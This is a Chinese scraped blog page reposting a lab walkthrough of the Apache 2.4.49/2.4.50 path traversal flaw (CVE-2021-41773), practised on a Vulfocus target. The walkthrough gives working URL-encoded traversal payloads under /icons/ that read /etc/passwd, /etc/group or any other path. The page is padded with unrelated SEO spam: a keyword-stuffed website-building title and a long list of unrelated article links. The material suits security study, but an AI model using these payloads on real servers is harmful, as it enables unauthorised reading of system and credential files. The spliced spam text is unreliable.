当前位置: 首页 > news >正文

怎么样开始做网站小学校园文化建设网站

怎么样开始做网站,小学校园文化建设网站,国外网站ip地址,如何制作免费永久网站中间件安全:Apache 目录穿透.(CVE-2021-41773) Apache 的 2.4.49、2.4.50 版本 对路径规范化所做的更改中存在一个路径穿越漏洞,攻击者可利用该漏洞读取到Web目录外的其他文件,如系统配置文件、网站源码等&#xff0c…

中间件安全:Apache 目录穿透.(CVE-2021-41773)

Apache 的 2.4.49、2.4.50 版本 对路径规范化所做的更改中存在一个路径穿越漏洞,攻击者可利用该漏洞读取到Web目录外的其他文件,如系统配置文件、网站源码等,甚至在特定情况下,攻击者可构造恶意请求执行命令,控制服务器。


目录:

中间件安全:Apache 目录穿透.(CVE-2021-41773)

Apache 目录穿透:

靶场准备:Web安全:Vulfocus 靶场搭建.(漏洞集成平台)_vulfocus靶场搭建-CSDN博客

漏洞测试:

第一步:检测 Apache 的版本号.(发现是 Apache/2.4.50 ,说明可能存在漏洞. )

第二步:进行访问,使用 Burp 进行抓包,把我们构成的命令替换进入.


Apache 目录穿透:

靶场准备:Web安全:Vulfocus 靶场搭建.(漏洞集成平台)_vulfocus靶场搭建-CSDN博客


漏洞测试:

第一步:检测 Apache 的版本号.(发现是 Apache/2.4.50 ,说明可能存在漏洞. )


第二步:进行访问,使用 Burp 进行抓包,把我们构成的命令替换进入.

# 查找存储用户账户信息,包括用户名和用户 ID
/icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd# 查找存储组信息,包括组名和组成员
/icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/group# 如果需要查看别的目录信息,则替换后面的就行.
/icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/目录路径

    

    

    

学习链接:第59天:服务攻防-中间件安全_CVE复现_IIS_Apache_Tomcat_Nginx_哔哩哔哩_bilibili

http://www.yayakq.cn/news/165503/

相关文章:

  • 东莞大朗网站设计网站自己推广
  • wordpress多站点无法发布文章郑州网站推广效果
  • 购物网站用户管理做外贸网站维护费是多少
  • 怎么在各大网站做推广管理系统网站开发
  • 网站制作公司司徐州市制作网站
  • 中国物流网官方网站百度网盘资源搜索
  • 聊城做网站网站前端设计理念
  • 成品网站w灬源码16伊园thecontent WordPress
  • 网赌赢了钱被网站黑了需要怎么做小程序开发定制公司北京
  • p2p网站的建设学网站开发需要会什么
  • 北京网站建设公司司世界500强企业排名2020
  • 网站设计需要学什么软件wordpress加速优化
  • 中国住房城乡建设部网站长网络推广
  • 物流公司网站源码重庆工程建设信息网官网查询
  • wordpress 首页调用栏目文章列表google网站优化器
  • h5电子商城网站开发宁波网站建设怎么建设
  • 个人网站开论坛没有网站域名备案信息
  • 上海集团网站建设价格陕西省建设厅八大员证
  • 台州网站建设蓝渊阿里网站建设工具
  • 东莞快速网站制作哪家强正规漫画网站开发流程
  • 以下不属于网站建设优化wordpress 标签 结构
  • 互联网营销 网站 推荐长春做高端网站公司
  • 成都设计网站建设如何建网站教程视频
  • 建设公司网站有什么好处公司网站建设与维护方案ppt
  • 汕头龙湖网站建设广西网站建设哪里好
  • 网站诊断与优化的作用工程建筑公司
  • 网页做二维码哪个网站好住房与城乡建设部
  • 扬州做网站需要多少钱wordpress add_options_page
  • html5网站模板移动端wordpress 产品多个分类
  • 网站建设全包方案wordpress授权系统